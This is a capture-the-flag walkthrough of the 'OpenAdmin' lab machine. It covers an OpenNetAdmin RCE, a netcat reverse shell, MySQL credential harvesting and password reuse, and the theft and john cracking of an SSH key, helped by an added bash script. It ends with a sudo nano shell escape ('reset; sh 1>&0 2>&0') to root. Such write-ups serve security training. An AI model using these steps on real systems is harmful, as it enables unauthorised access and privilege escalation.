OpenAdmin
Nmap
Checking port 80, we find that the root page is the default Apache 2 install page.
Running dirsearch.py against the target we find multiple directories:
I manually looked through the discovered directories that returned web pages, but was unable to find any interesting information in them.
I then started OWASP ZAP and ran an active spider against the site. ZAP soon picked up the sub-page /ona.
Browsing to /ona:
We see from the title in the browser tab that this is OpenNetAdmin, and the page itself shows that the target is running version v18.1.1.
What is OpenNetAdmin?
OpenNetAdmin is a system for tracking IP network attributes in a database. A web interface is provided to administer the data, and there is a fully functional CLI interface for batch management (for those of you who prefer NOT to use a GUI). There are also several backend processes for building DHCP, DNS, router configuration, etc.
Checking searchsploit for known exploits gives results for an RCE.
Further exploit searching shows a reliable Python exploit for OpenNetAdmin:
Clone the repository:
Then execute the script:
While this gives us a shell, it is not a proper interactive one: every command runs in the same working directory, so we cannot navigate the target system easily. To resolve this I first checked which useful binaries were available on the target system, which showed nc as present. I then set up a netcat listener on my attacking machine on port 443 and executed the following netcat reverse shell on the target system:
Now we have a full reverse shell. After some manual enumeration I found some interesting information in /opt/ona/www/local/config/database_settings.inc.php.
We have discovered the following MySQL credentials: ona_sys:n1nj4W4rri0R!
We can also check for password reuse. The home directory lists two users, jimmy and joanna.
I tried SSH as jimmy with the password above and was given access.
From here, further enumeration shows a directory named 'internal' that is accessible only to jimmy and members of the internal group.
Then the following files inside the directory:
Checking the contents of main:
When main.php is executed it outputs Joanna's SSH private key. This directory is not served by the site on port 80, so something else must be hosting it.
Checking netstat we see something listening locally on port 52846. Since it is only reachable locally, curl has to be run from the box itself (from the jimmy SSH session) against that port and main.php, which returns a valid result:
Copy the key to the attacking machine and set the correct key permissions (chmod 600; ssh refuses a private key that other users can read):
As we can see from the line 'Proc-Type: 4,ENCRYPTED', the key is passphrase-protected, so we will need the passphrase to authenticate with it over SSH.
We can use ssh2john.py to convert the key file into a hash that John can work on, then crack it with John:
We can then log in over SSH as joanna using the key, entering the passphrase John recovered when prompted.
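The key-handling steps above (fetching main.php, saving the key with the right permissions, checking whether it is encrypted, and only then running ssh2john.py and john), as an added bash example that is not from the write-up: any HTML on the same line as the PEM BEGIN/END markers is stripped, the file is created with mode 600, and the Proc-Type header decides whether a passphrase attack is needed. The URL, file names, wordlist path and function names are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up. Pulls a private key out
# of the HTML that main.php returns, stores it with the permissions ssh
# requires, and decides whether a passphrase attack (ssh2john + john) is needed.
# INTERNAL_URL and the default paths are assumptions matching the enumeration.

INTERNAL_URL="${INTERNAL_URL:-http://127.0.0.1:52846/main.php}"

# Keep only the PEM block, dropping any HTML that shares a line with the
# BEGIN or END marker (e.g. a <pre> tag glued to the first line).
extract_pem() {
    sed -n '/-----BEGIN .*PRIVATE KEY-----/,/-----END .*PRIVATE KEY-----/p' \
        | sed -e 's/^.*-----BEGIN/-----BEGIN/' -e 's/KEY-----.*$/KEY-----/'
}

# Save the PEM block read from stdin to $1 with mode 600 from the start,
# so the key is never world-readable even briefly. Fails if no key was found.
save_key() {
    local out="$1"
    ( umask 077; extract_pem > "$out" )
    chmod 600 "$out"
    [ -s "$out" ]
}

# Legacy PEM keys mark a passphrase with a Proc-Type: 4,ENCRYPTED header.
# The newer "-----BEGIN OPENSSH PRIVATE KEY-----" format has no such header
# (ssh2john handles both, but this check only covers the legacy form).
key_is_encrypted() {
    grep -q '^Proc-Type: 4,ENCRYPTED' "$1"
}

# Full procedure against the live service. Needs ssh2john.py and john on
# PATH and must run where 127.0.0.1:52846 is reachable (the box itself, or
# through an SSH port-forward from the jimmy session).
fetch_and_crack() {
    local key="${1:-joanna.key}" wordlist="${2:-/usr/share/wordlists/rockyou.txt}"
    curl -s "$INTERNAL_URL" | save_key "$key" \
        || { echo "no private key in response" >&2; return 1; }
    if key_is_encrypted "$key"; then
        ssh2john.py "$key" > "$key.hash"
        john --wordlist="$wordlist" "$key.hash"
        john --show "$key.hash"
    else
        echo "key is not passphrase-protected; use it directly" >&2
    fi
}
```

Once john --show prints the passphrase, ssh -i joanna.key joanna@target and enter it at the prompt.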
Checking sudo -l for sudo privileges, we see that joanna can run /bin/nano /opt/priv as any user without providing a password.
Checking nano against GTFOBins, we see that nano can spawn a shell. Because sudo runs the editor as root, the spawned shell is root as well; pinning the rule to the single file /opt/priv does not prevent this.
To spawn a root shell run the following command:
When in the nano editor press the following keys (GTFOBins documents Ctrl+R followed by Ctrl+X to reach nano's 'execute command' prompt, then a command such as reset; sh 1>&0 2>&0 to attach a shell to nano's terminal):